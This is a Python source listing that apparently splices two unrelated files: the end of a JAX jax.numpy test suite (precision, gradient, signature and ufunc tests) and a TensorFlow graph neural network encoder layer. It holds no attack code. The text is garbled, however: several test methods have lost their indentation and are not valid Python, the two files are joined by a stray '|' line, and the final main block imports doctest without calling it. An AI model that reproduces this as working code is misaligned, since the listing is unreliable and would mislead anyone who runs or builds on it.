"If using `jit`, try using `static_argnums` or applying `jit` to smaller subfunctions.",
lambda: api.jit(jnp.zeros)(2))
def testTraceMethod(self):
x = self.rng().randn(3, 4).astype(jnp.float_)
self.assertAllClose(x.trace(), jnp.array(x).trace())
self.assertAllClose(x.trace(), api.jit(lambda y: y.trace())(x))
def testIntegerPowersArePrecise(self):
# See https://github.com/google/jax/pull/3036
# Checks if the squares of float32 integers have no numerical errors.
# It should be satisfied with all integers less than sqrt(2**24).
x = jnp.arange(-2**12, 2**12, dtype=jnp.int32)
np.testing.assert_array_equal(jnp.square(x.astype(jnp.float32)), x * x)
np.testing.assert_array_equal(x.astype(jnp.float32) ** 2, x * x)
# Similarly for cubes.
x = jnp.arange(-2**8, 2**8, dtype=jnp.int32)
np.testing.assert_array_equal(x.astype(jnp.float32) ** 3, x * x * x)
x = np.arange(10, dtype=np.float32)
for i in range(10):
self.assertAllClose(x.astype(jnp.float32) ** i, x ** i,
check_dtypes=False)
def testToBytes(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
for order in ['C', 'F']:
self.assertEqual(jnp.asarray(v).tobytes(order), v.tobytes(order))
def testToList(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
self.assertEqual(jnp.asarray(v).tolist(), v.tolist())
def testReductionWithRepeatedAxisError(self):
with self.assertRaisesRegex(ValueError, r"duplicate value in 'axis': \(0, 0\)"):
jnp.sum(jnp.arange(3), (0, 0))
def testArangeConcretizationError(self):
msg = r"It arose in jax.numpy.arange argument `{}`".format
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
jax.jit(jnp.arange)(3)
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('start')):
jax.jit(lambda start: jnp.arange(start, 3))(0)
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
jax.jit(lambda stop: jnp.arange(0, stop))(3)
def testIssue2347(self):
# https://github.com/google/jax/issues/2347
object_list = List[Tuple[jnp.array, float, float, jnp.array, bool]]
self.assertRaises(TypeError, jnp.array, object_list)
np_object_list = np.array(object_list)
self.assertRaises(TypeError, jnp.array, np_object_list)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
       "shapes": shapes, "dtypes": dtypes}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(all_shapes, 2))
      for dtypes in itertools.product(
        *(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLogaddexpComplex(self, shapes, dtypes):
    """Checks jnp.logaddexp on complex inputs against log(exp(x1) + exp(x2))."""
    @jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
    def np_op(x1, x2):
      return np.log(np.exp(x1) + np.exp(x2))

    rng = jtu.rand_some_nan(self.rng())
    args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
    if jtu.device_under_test() == 'tpu':
      tol = {np.complex64: 1e-3, np.complex128: 1e-10}
    else:
      tol = {np.complex64: 1e-5, np.complex128: 1e-14}
    self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp, args_maker, tol=tol)
    self._CompileAndCheck(jnp.logaddexp, args_maker, rtol=tol, atol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
       "shapes": shapes, "dtypes": dtypes}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(all_shapes, 2))
      for dtypes in itertools.product(
        *(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLogaddexp2Complex(self, shapes, dtypes):
    """Checks jnp.logaddexp2 on complex inputs against log2(2**x1 + 2**x2)."""
    @jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
    def np_op(x1, x2):
      return np.log2(np.exp2(x1) + np.exp2(x2))

    rng = jtu.rand_some_nan(self.rng())
    args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
    if jtu.device_under_test() == 'tpu':
      tol = {np.complex64: 1e-3, np.complex128: 1e-10}
    else:
      tol = {np.complex64: 1e-5, np.complex128: 1e-14}
    self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp2, args_maker, tol=tol)
    self._CompileAndCheck(jnp.logaddexp2, args_maker, rtol=tol, atol=tol)
# Most grad tests are at the lax level (see lax_test.py), but we add some here
# as needed for e.g. particular compound ops of interest.

# One gradient test case: the op under test, its arity, the differentiation
# order to check, an RNG factory for inputs, the dtypes to cover, a display
# name, and an optional tolerance override.
GradTestSpec = collections.namedtuple(
    "GradTestSpec",
    ["op", "nargs", "order", "rng_factory", "dtypes", "name", "tol"])
def grad_test_spec(op, nargs, order, rng_factory, dtypes, name=None, tol=None):
  # Convenience constructor: defaults the display name to the op's __name__.
  return GradTestSpec(
      op, nargs, order, rng_factory, dtypes, name or op.__name__, tol)

GRAD_TEST_RECORDS = [
    grad_test_spec(jnp.arcsinh, nargs=1, order=2,
                   rng_factory=jtu.rand_positive,
                   dtypes=[np.float64, np.complex64],
                   tol={np.complex64: 2e-2}),
    grad_test_spec(jnp.arccosh, nargs=1, order=2,
                   rng_factory=jtu.rand_positive,
                   dtypes=[np.float64, np.complex64],
                   tol={np.complex64: 2e-2}),
    grad_test_spec(jnp.arctanh, nargs=1, order=2,
                   rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
                   dtypes=[np.float64, np.complex64],
                   tol={np.complex64: 2e-2}),
    grad_test_spec(jnp.logaddexp, nargs=2, order=1,
                   rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
                   dtypes=[np.float64], tol=1e-4),
    grad_test_spec(jnp.logaddexp2, nargs=2, order=2,
                   rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
                   dtypes=[np.float64], tol=1e-4),
]

# One special-value gradient case: the op, the input points, and the order.
GradSpecialValuesTestSpec = collections.namedtuple(
    "GradSpecialValuesTestSpec", ["op", "values", "order"])
GRAD_SPECIAL_VALUE_TEST_RECORDS = [
    GradSpecialValuesTestSpec(jnp.arcsinh, [0., 1000.], 2),
    GradSpecialValuesTestSpec(jnp.arccosh, [1000.], 2),
    GradSpecialValuesTestSpec(jnp.arctanh, [0.], 2),
    GradSpecialValuesTestSpec(jnp.sinc, [0.], 1),
]
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyGradTests(jtu.JaxTestCase):
  """Gradient tests for selected jax.numpy compound ops."""

  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": jtu.format_test_name_suffix(
          rec.name, shapes, itertools.repeat(dtype)),
         "op": rec.op, "rng_factory": rec.rng_factory, "shapes": shapes, "dtype": dtype,
         "order": rec.order, "tol": rec.tol}
        for shapes in itertools.combinations_with_replacement(nonempty_shapes, rec.nargs)
        for dtype in rec.dtypes)
      for rec in GRAD_TEST_RECORDS))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testOpGrad(self, op, rng_factory, shapes, dtype, order, tol):
    """Numerically checks fwd/rev gradients for each GRAD_TEST_RECORDS entry."""
    rng = rng_factory(self.rng())
    tol = jtu.join_tolerance(tol, {np.float32: 1e-1, np.float64: 1e-3,
                                   np.complex64: 1e-1, np.complex128: 1e-3})
    args = tuple(rng(shape, dtype) for shape in shapes)
    check_grads(op, args, order, ["fwd", "rev"], tol, tol)

  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": "_{}_{}".format(rec.op.__name__, special_value),
         "op": rec.op, "special_value": special_value, "order": rec.order}
        for special_value in rec.values)
      for rec in GRAD_SPECIAL_VALUE_TEST_RECORDS))
  def testOpGradSpecialValue(self, op, special_value, order):
    """Checks gradients at hand-picked special input values."""
    check_grads(op, (special_value,), order, ["fwd", "rev"],
                atol={np.float32: 3e-3})

  def testSincAtZero(self):
    """Checks derivatives of jnp.sinc at zero against closed-form values."""
    # Some manual tests for sinc at zero, since it doesn't have well-behaved
    # numerical derivatives at zero
    def deriv(f):
      return lambda x: api.jvp(f, (x,), (1.,))[1]

    def apply_all(fns, x):
      for f in fns:
        x = f(x)
      return x

    d1 = 0.
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 1):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d1)

    d2 = -np.pi ** 2 / 3
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 2):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d2)

    d3 = 0.
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 3):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d3)

    d4 = np.pi ** 4 / 5
    for ops in itertools.combinations_with_replacement([deriv, api.grad], 4):
      self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d4)

  def testSincGradArrayInput(self):
    """Gradient of sinc over an array input must not crash."""
    # tests for a bug almost introduced in #5077
    jax.grad(lambda x: jnp.sinc(x).sum())(jnp.arange(10.))  # doesn't crash

  def testTakeAlongAxisIssue1521(self):
    """Gradient through take_along_axis (Issue #1521)."""
    # https://github.com/google/jax/issues/1521
    idx = jnp.repeat(jnp.arange(3), 10).reshape((30, 1))

    def f(x):
      y = x * jnp.arange(3.).reshape((1, 3))
      return jnp.take_along_axis(y, idx, -1).sum()

    check_grads(f, (1.,), order=1)

  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
       "shapes": shapes, "dtype": dtype}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(nonempty_shapes, 2))
      for dtype in (np.complex128, )))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testGradLogaddexpComplex(self, shapes, dtype):
    """First-order fwd/rev gradients of logaddexp on complex inputs."""
    rng = jtu.rand_default(self.rng())
    args = tuple(rng(shape, dtype) for shape in shapes)
    if jtu.device_under_test() == "tpu":
      tol = 5e-2
    else:
      tol = 3e-2
    check_grads(jnp.logaddexp, args, 1, ["fwd", "rev"], tol, tol)

  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
       "shapes": shapes, "dtype": dtype}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(nonempty_shapes, 2))
      for dtype in (np.complex128, )))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testGradLogaddexp2Complex(self, shapes, dtype):
    """First-order fwd/rev gradients of logaddexp2 on complex inputs."""
    rng = jtu.rand_default(self.rng())
    args = tuple(rng(shape, dtype) for shape in shapes)
    if jtu.device_under_test() == "tpu":
      tol = 5e-2
    else:
      tol = 3e-2
    check_grads(jnp.logaddexp2, args, 1, ["fwd", "rev"], tol, tol)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpySignaturesTest(jtu.JaxTestCase):
  """Checks that the jax.numpy wrappers accept the same signatures as numpy."""

  def testWrappedSignaturesMatch(self):
    """Test that jax.numpy function signatures match numpy."""
    # Every jnp function that records the numpy function it wraps via
    # __np_wrapped__ is paired with that numpy function for comparison.
    jnp_funcs = {name: getattr(jnp, name) for name in dir(jnp)}
    func_pairs = {name: (fun, fun.__np_wrapped__) for name, fun in jnp_funcs.items()
                  if hasattr(fun, '__np_wrapped__')}
    assert len(func_pairs) > 0

    # TODO(jakevdp): fix some of the following signatures. Some are due to wrong argument names.
    # numpy parameters the jnp wrappers knowingly do not accept.
    unsupported_params = {
      'angle': ['deg'],
      'asarray': ['like'],
      'broadcast_to': ['subok', 'array'],
      'clip': ['kwargs'],
      'corrcoef': ['ddof', 'bias', 'dtype'],
      'cov': ['dtype'],
      'empty_like': ['subok', 'order'],
      'einsum': ['kwargs'],
      'einsum_path': ['einsum_call'],
      'eye': ['order', 'like'],
      'identity': ['like'],
      'full': ['order', 'like'],
      'full_like': ['subok', 'order'],
      'histogram': ['normed'],
      'histogram2d': ['normed'],
      'histogramdd': ['normed'],
      'ones': ['order', 'like'],
      'ones_like': ['subok', 'order'],
      'tri': ['like'],
      'unwrap': ['period'],
      'zeros_like': ['subok', 'order']
    }
    # Parameters the jnp wrappers add on top of the numpy signature.
    extra_params = {
      'broadcast_to': ['arr'],
      'einsum': ['precision'],
      'einsum_path': ['subscripts'],
    }

    mismatches = {}

    for name, (jnp_fun, np_fun) in func_pairs.items():
      # broadcast_shapes is not available in numpy < 1.20
      if numpy_version < (1, 20) and name == "broadcast_shapes":
        continue
      # Some signatures have changed; skip for older numpy versions.
      if numpy_version < (1, 19) and name in ['einsum_path', 'gradient', 'isscalar']:
        continue
      # Note: can't use inspect.getfullargspec due to numpy issue
      # https://github.com/numpy/numpy/issues/12225
      try:
        np_params = inspect.signature(np_fun).parameters
      except ValueError:
        # Some functions cannot be inspected
        continue
      jnp_params = inspect.signature(jnp_fun).parameters
      extra = set(extra_params.get(name, []))
      unsupported = set(unsupported_params.get(name, []))

      # Checks to prevent tests from becoming out-of-date. If these fail,
      # it means that extra_params or unsupported_params need to be updated.
      assert extra.issubset(jnp_params), f"{name}: extra={extra} is not a subset of jnp_params={set(jnp_params)}."
      assert not unsupported.intersection(jnp_params), f"{name}: unsupported={unsupported} overlaps with jnp_params={set(jnp_params)}."

      # Skip functions that only have *args and **kwargs; we can't introspect these further.
      var_args = (inspect.Parameter.VAR_POSITIONAL, inspect.Parameter.VAR_KEYWORD)
      if all(p.kind in var_args for p in jnp_params.values()):
        continue
      if all(p.kind in var_args for p in np_params.values()):
        continue

      # Remove known extra parameters.
      jnp_params = {a: p for a, p in jnp_params.items() if a not in extra}

      # Remove known unsupported parameters.
      np_params = {a: p for a, p in np_params.items() if a not in unsupported}

      # Older versions of numpy may have fewer parameters; to avoid extraneous errors on older numpy
      # versions, we allow for jnp to have more parameters.
      if list(jnp_params)[:len(np_params)] != list(np_params):
        mismatches[name] = {'np_params': list(np_params), 'jnp_params': list(jnp_params)}

    self.assertEqual(mismatches, {})
# All concrete dtype names used below (see _dtypes_for_ufunc) to probe which
# input dtypes each numpy ufunc accepts.
_all_dtypes: List[str] = [
  "bool_",
  "uint8", "uint16", "uint32", "uint64",
  "int8", "int16", "int32", "int64",
  "float16", "float32", "float64",
  "complex64", "complex128",
]
def _all_numpy_ufuncs() -> Iterator[str]:
"""Generate the names of all ufuncs in the top-level numpy namespace."""
for name in dir(np):
f = getattr(np, name)
if isinstance(f, np.ufunc):
yield name
def _dtypes_for_ufunc(name: str) -> Iterator[Tuple[str, ...]]:
  """Generate valid dtypes of inputs to the given numpy ufunc."""
  ufunc = getattr(np, name)
  # Try every dtype combination matching the ufunc's input arity; keep the
  # ones the ufunc accepts (i.e. that do not raise TypeError).
  for candidate in itertools.product(_all_dtypes, repeat=ufunc.nin):
    sample_args = tuple(np.ones(1, dtype=d) for d in candidate)
    with warnings.catch_warnings():
      warnings.filterwarnings("ignore", "divide by zero", RuntimeWarning)
      try:
        ufunc(*sample_args)
      except TypeError:
        continue
    yield candidate
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyUfuncTests(jtu.JaxTestCase):
  """Compares jnp counterparts of numpy ufuncs across all accepted input dtypes."""

  @parameterized.named_parameters(
      {"testcase_name": f"_{name}_{','.join(arg_dtypes)}",
       "name": name, "arg_dtypes": arg_dtypes}
      for name in _all_numpy_ufuncs()
      for arg_dtypes in jtu.cases_from_list(_dtypes_for_ufunc(name)))
  def testUfuncInputTypes(self, name, arg_dtypes):
    # TODO(jakevdp): fix following failures and remove from this exception list.
    if (name in ['divmod', 'floor_divide', 'fmod', 'gcd', 'left_shift', 'mod',
                 'power', 'remainder', 'right_shift', 'rint', 'square']
        and 'bool_' in arg_dtypes):
      self.skipTest(f"jax.numpy does not support {name}{tuple(arg_dtypes)}")
    if name == 'arctanh' and jnp.issubdtype(arg_dtypes[0], jnp.complexfloating):
      self.skipTest("np.arctanh & jnp.arctanh have mismatched NaNs for complex input.")

    # Skip dtypes the current backend cannot represent.
    for dtype in arg_dtypes:
      jtu.skip_if_unsupported_type(dtype)

    jnp_op = getattr(jnp, name)
    np_op = getattr(np, name)
    # Suppress numpy's divide-by-zero warnings so they don't fail the run.
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="divide by zero.*")(np_op)
    args_maker = lambda: tuple(np.ones(1, dtype=dtype) for dtype in arg_dtypes)

    try:
      jnp_op(*args_maker())
    except NotImplementedError:
      self.skipTest(f"jtu.{name} is not yet implemented.")

    # large tol comes from the fact that numpy returns float16 in places
    # that jnp returns float32. e.g. np.cos(np.uint8(0))
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker, check_dtypes=False, tol=1E-2)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyDocTests(jtu.JaxTestCase):
  """Sanity checks on jnp docstring wrapping and on numpydoc parsing."""

  def test_lax_numpy_docstrings(self):
    # Test that docstring wrapping & transformation didn't fail.

    # Functions that have their own docstrings & don't wrap numpy.
    known_exceptions = {'broadcast_arrays', 'vectorize'}
    for name in dir(jnp):
      if name in known_exceptions or name.startswith('_'):
        continue

      # We only check signatures of functions.
      obj = getattr(jnp, name)
      if isinstance(obj, type) or not callable(obj):
        continue

      # Some jnp functions are imported from numpy or jax.dtypes directly.
      if any(obj is getattr(mod, obj.__name__, None) for mod in [np, dtypes]):
        continue

      wrapped_fun = obj.__np_wrapped__

      # If the wrapped function has a docstring, obj should too
      if wrapped_fun.__doc__ and not obj.__doc__:
        raise Exception(f"jnp.{name} does not contain wrapped docstring.")

      if obj.__doc__ and "*Original docstring below.*" not in obj.__doc__:
        raise Exception(f"jnp.{name} does not have a wrapped docstring.")

  def test_parse_numpydoc(self):
    # Unit test ensuring that _parse_numpydoc correctly parses docstrings for all
    # functions in NumPy's top-level namespace.
    section_titles = {'Attributes', 'Examples', 'Notes',
                      'Parameters', 'Raises', 'References',
                      'Returns', 'See also', 'See Also', 'Warnings', 'Warns'}
    headings = [title + '\n' + '-'*len(title) for title in section_titles]

    for name in dir(np):
      if name.startswith('_'):
        continue
      obj = getattr(np, name)
      if isinstance(obj, type):
        continue
      if not callable(obj):
        continue
      if 'built-in function' in repr(obj):
        continue
      parsed = _parse_numpydoc(obj.__doc__)

      # Check that no docstring is handled gracefully.
      if not obj.__doc__:
        self.assertEqual(parsed, ParsedDoc(obj.__doc__))
        continue

      # Check that no unexpected section names are found.
      extra_keys = parsed.sections.keys() - section_titles
      if extra_keys:
        raise ValueError(f"Extra section headers found in np.{name}: {extra_keys}")

      # Check that every docstring has a summary.
      if not parsed.summary:
        raise ValueError(f"No summary found for np.{name}")

      # Check that no expected headings are missed.
      for heading in headings:
        assert heading not in parsed.front_matter
if __name__ == "__main__":
  # Run the test suite with JAX's custom test loader.
  absltest.main(testLoader=jtu.JaxTestLoader())
|
"""GNN Encoder class."""
from itertools import count
from typing import Any, Dict, NamedTuple, List, Tuple, Optional
import tensorflow as tf
from dpu_utils.tf2utils import MLP
from tf2_gnn.utils.param_helpers import get_activation_function
from .message_passing import (
MessagePassing,
MessagePassingInput,
get_message_passing_class,
)
from .graph_global_exchange import (
GraphGlobalExchangeInput,
GraphGlobalExchange,
GraphGlobalMeanExchange,
GraphGlobalGRUExchange,
GraphGlobalMLPExchange,
)
from .nodes_to_graph_representation import (
WeightedSumGraphRepresentation,
NodesToGraphRepresentationInput,
)
class GNNInput(NamedTuple):
    """Input named tuple for the GNN."""

    # Float tensor of shape [V, D]: initial representation of each node in the batch.
    node_features: tf.Tensor
    # One int tensor of shape [E, 2] per edge type; row [v, u] is an edge from v to u.
    adjacency_lists: Tuple[tf.Tensor, ...]
    # Int tensor of shape [V] mapping each node to the index of its graph in the batch.
    node_to_graph_map: tf.Tensor
    # Scalar int tensor: the number of graphs in the batch.
    num_graphs: tf.Tensor
class GNN(tf.keras.layers.Layer):
    """Encode graph states using a combination of graph message passing layers and dense layers

    Example usage:
    >>> layer_input = GNNInput(
    ...     node_features = tf.random.normal(shape=(5, 3)),
    ...     adjacency_lists = (
    ...         tf.constant([[0, 1], [1, 2], [3, 4]], dtype=tf.int32),
    ...         tf.constant([[1, 2], [3, 4]], dtype=tf.int32),
    ...         tf.constant([[2, 0]], dtype=tf.int32)
    ...     ),
    ...     node_to_graph_map = tf.fill(dims=(5,), value=0),
    ...     num_graphs = 1,
    ... )
    ...
    >>> params = GNN.get_default_hyperparameters()
    >>> params["hidden_dim"] = 12
    >>> layer = GNN(params)
    >>> output = layer(layer_input)
    >>> print(output)
    tf.Tensor(..., shape=(5, 12), dtype=float32)
    """

    @classmethod
    def get_default_hyperparameters(cls, mp_style: Optional[str] = None) -> Dict[str, Any]:
        """Get the default hyperparameter dictionary for the class.

        Args:
            mp_style: Optional name of the message passing class to use; when
                given, overrides the default "rgcn" message calculation class.

        Returns:
            Dict of default hyperparameters: the chosen message passing class's
            defaults, overridden by the GNN-level defaults below.
        """
        these_hypers: Dict[str, Any] = {
            "message_calculation_class": "rgcn",
            "initial_node_representation_activation": "tanh",
            "dense_intermediate_layer_activation": "tanh",
            "num_layers": 4,
            "dense_every_num_layers": 2,
            "residual_every_num_layers": 2,
            "use_inter_layer_layernorm": False,
            "hidden_dim": 16,
            "layer_input_dropout_rate": 0.0,
            "global_exchange_mode": "gru",  # One of "mean", "mlp", "gru"
            "global_exchange_every_num_layers": 2,
            "global_exchange_weighting_fun": "softmax",  # One of "softmax", "sigmoid"
            "global_exchange_num_heads": 4,
            "global_exchange_dropout_rate": 0.2,
        }
        if mp_style is not None:
            these_hypers["message_calculation_class"] = mp_style
        message_passing_class = get_message_passing_class(
            these_hypers["message_calculation_class"]
        )
        # GNN-level hyperparameters take precedence over the message passing
        # class defaults that share a name.
        message_passing_hypers = message_passing_class.get_default_hyperparameters()
        message_passing_hypers.update(these_hypers)
        return message_passing_hypers

    def __init__(self, params: Dict[str, Any]):
        """Initialise the layer.

        Args:
            params: Hyperparameter dict; see `get_default_hyperparameters`.

        Raises:
            ValueError: If `params["global_exchange_mode"]` is not one of
                "mean", "mlp", "gru" (case-insensitive).
        """
        super().__init__()
        self._params = params
        self._hidden_dim = params["hidden_dim"]
        self._num_layers = params["num_layers"]
        self._dense_every_num_layers = params["dense_every_num_layers"]
        self._residual_every_num_layers = params["residual_every_num_layers"]
        self._use_inter_layer_layernorm = params["use_inter_layer_layernorm"]
        self._initial_node_representation_activation_fn = get_activation_function(
            params["initial_node_representation_activation"]
        )
        self._dense_intermediate_layer_activation_fn = get_activation_function(
            params["dense_intermediate_layer_activation"]
        )
        self._message_passing_class = get_message_passing_class(
            params["message_calculation_class"]
        )
        # BUG FIX: the original f-string nested double quotes inside a
        # double-quoted f-string (f"...{params["global_exchange_mode"]}..."),
        # which is a SyntaxError on Python < 3.12; use single quotes inside.
        if params["global_exchange_mode"].lower() not in {"mean", "mlp", "gru"}:
            raise ValueError(
                f"Unknown global_exchange_mode mode {params['global_exchange_mode']} - has to be one of 'mean', 'mlp', 'gru'!"
            )
        self._global_exchange_mode = params["global_exchange_mode"]
        self._global_exchange_every_num_layers = params["global_exchange_every_num_layers"]
        self._global_exchange_weighting_fun = params["global_exchange_weighting_fun"]
        self._global_exchange_num_heads = params["global_exchange_num_heads"]
        self._global_exchange_dropout_rate = params["global_exchange_dropout_rate"]

        # Layer member variables. To be filled in in the `build` method.
        self._initial_projection_layer: Optional[tf.keras.layers.Layer] = None
        self._mp_layers: List[MessagePassing] = []
        self._inter_layer_layernorms: List[tf.keras.layers.Layer] = []
        # Dense and global-exchange sublayers are keyed by str(layer_idx)
        # because only some layers get one.
        self._dense_layers: Dict[str, tf.keras.layers.Layer] = {}
        self._global_exchange_layers: Dict[str, GraphGlobalExchange] = {}

    def build(self, tensor_shapes: GNNInput):
        """Build the various layers in the model.

        Args:
            tensor_shapes: A GNNInput of tensor shapes.

        Returns:
            Nothing, but initialises the layers in the model based on the tensor shapes given.
        """
        # First, we go through the input shapes and make sure that anything which might vary batch
        # to batch (number of nodes / number of edges) is set to None.
        initial_node_features_shape: tf.TensorShape = tensor_shapes.node_features
        variable_node_features_shape = tf.TensorShape((None, initial_node_features_shape[1]))
        adjacency_list_shapes = tensor_shapes.adjacency_lists
        embedded_shape = tf.TensorShape((None, self._hidden_dim))

        with tf.name_scope(f"{self._message_passing_class.__name__}_GNN"):
            # Then we construct the layers themselves:
            with tf.name_scope("gnn_initial_node_projection"):
                self._initial_projection_layer = tf.keras.layers.Dense(
                    units=self._hidden_dim,
                    use_bias=False,
                    activation=self._initial_node_representation_activation_fn,
                )
                self._initial_projection_layer.build(variable_node_features_shape)

            # Construct the graph message passing layers.
            for layer_idx in range(self._num_layers):
                with tf.name_scope(f"Layer_{layer_idx}"):
                    with tf.name_scope("MessagePassing"):
                        self._mp_layers.append(
                            self._message_passing_class(self._params)
                        )
                        self._mp_layers[-1].build(
                            MessagePassingInput(embedded_shape, adjacency_list_shapes)
                        )

                    # If required, prepare for a LayerNorm:
                    if self._use_inter_layer_layernorm:
                        with tf.name_scope("LayerNorm"):
                            self._inter_layer_layernorms.append(
                                tf.keras.layers.LayerNormalization()
                            )
                            self._inter_layer_layernorms[-1].build(embedded_shape)

                    # Construct the per-node dense layers.
                    if layer_idx % self._dense_every_num_layers == 0:
                        with tf.name_scope("Dense"):
                            self._dense_layers[str(layer_idx)] = tf.keras.layers.Dense(
                                units=self._hidden_dim,
                                use_bias=False,
                                activation=self._dense_intermediate_layer_activation_fn,
                            )
                            self._dense_layers[str(layer_idx)].build(embedded_shape)

                    # Global exchange layers are skipped for layer 0.
                    if (
                        layer_idx
                        and layer_idx % self._global_exchange_every_num_layers == 0
                    ):
                        with tf.name_scope("Global_Exchange"):
                            if self._global_exchange_mode.lower() == "mean":
                                exchange_layer_class = GraphGlobalMeanExchange
                            elif self._global_exchange_mode.lower() == "gru":
                                exchange_layer_class = GraphGlobalGRUExchange
                            elif self._global_exchange_mode.lower() == "mlp":
                                exchange_layer_class = GraphGlobalMLPExchange
                            exchange_layer = exchange_layer_class(
                                hidden_dim=self._hidden_dim,
                                weighting_fun=self._global_exchange_weighting_fun,
                                num_heads=self._global_exchange_num_heads,
                                dropout_rate=self._global_exchange_dropout_rate,
                            )
                            exchange_layer.build(
                                GraphGlobalExchangeInput(
                                    node_embeddings=tf.TensorShape(
                                        (None, self._hidden_dim)
                                    ),
                                    node_to_graph_map=tf.TensorShape((None,)),
                                    num_graphs=tf.TensorShape(()),
                                )
                            )
                            self._global_exchange_layers[
                                str(layer_idx)
                            ] = exchange_layer

        super().build(tensor_shapes)

        # Wrap `call` in a tf.function with a fixed input signature to avoid
        # retracing for every batch size.
        call_input_spec = (
            GNNInput(
                node_features=tf.TensorSpec(shape=variable_node_features_shape, dtype=tf.float32),
                adjacency_lists=tuple(
                    tf.TensorSpec(shape=(None, 2), dtype=tf.int32)
                    for _ in range(len(adjacency_list_shapes))
                ),
                node_to_graph_map=tf.TensorSpec(shape=(None,), dtype=tf.int32),
                num_graphs=tf.TensorSpec(shape=(), dtype=tf.int32),
            ),
            tf.TensorSpec(shape=(), dtype=tf.bool),
        )
        setattr(self, "call", tf.function(func=self.call, input_signature=call_input_spec))

    def call(self, inputs: GNNInput, training: bool = False):
        """
        Args:
            inputs: A GNNInput containing the following fields:
                node_features: float32 tensor of shape [V, D], the original representation
                    of each node in the graph.
                adjacency_lists: an tuple of tensors of shape [E, 2] which represents an adjacency
                    list for a given edge type. Concretely,
                        adjacency_list[l][k,:] == [v, u]
                    means that the k-th edge of type l connects node v to node u.
                node_to_graph_map: int32 tensor of shape [V], where node_to_graph_map[v] = i
                    means that node v belongs to graph i in the batch.
                num_graphs: int32 tensor of shape [], specifying number of graphs in batch.
            training: A bool representing whether the model is training or evaluating.

        Returns:
            A tensor of shape [V, hidden_dim], where hidden_dim was defined in the layer
            initialisation. The tensor represents the encoding of the initial node_features by the
            GNN framework.
        """
        initial_node_features: tf.Tensor = inputs.node_features
        adjacency_lists = inputs.adjacency_lists
        cur_node_representations = self._initial_projection_layer(initial_node_features)

        # Layer loop.
        last_node_representations = cur_node_representations
        for layer_idx, mp_layer in enumerate(self._mp_layers):
            if training:
                cur_node_representations = tf.nn.dropout(
                    cur_node_representations, rate=self._params["layer_input_dropout_rate"]
                )

            # Pass residuals through: average the current representation with
            # the one saved at the previous residual point.
            if layer_idx % self._residual_every_num_layers == 0:
                tmp = cur_node_representations
                if layer_idx > 0:
                    cur_node_representations += last_node_representations
                    cur_node_representations /= 2
                last_node_representations = tmp

            # Apply this message passing layer.
            cur_node_representations = mp_layer(
                MessagePassingInput(
                    node_embeddings=cur_node_representations, adjacency_lists=adjacency_lists
                ),
                training=training,
            )

            if layer_idx and layer_idx % self._global_exchange_every_num_layers == 0:
                cur_node_representations = self._global_exchange_layers[str(layer_idx)](
                    GraphGlobalExchangeInput(
                        node_embeddings=cur_node_representations,
                        node_to_graph_map=inputs.node_to_graph_map,
                        num_graphs=inputs.num_graphs,
                    ),
                    training=training,
                )

            # If required, apply a LayerNorm:
            if self._use_inter_layer_layernorm:
                cur_node_representations = self._inter_layer_layernorms[layer_idx](
                    cur_node_representations
                )

            # Apply dense layer, if needed.
            if layer_idx % self._dense_every_num_layers == 0:
                cur_node_representations = self._dense_layers[str(layer_idx)](
                    cur_node_representations, training=training
                )

        return cur_node_representations
if __name__ == "__main__":
    # Run the doctest embedded in the GNN class docstring; ELLIPSIS lets the
    # example's abbreviated tensor output match.
    import doctest

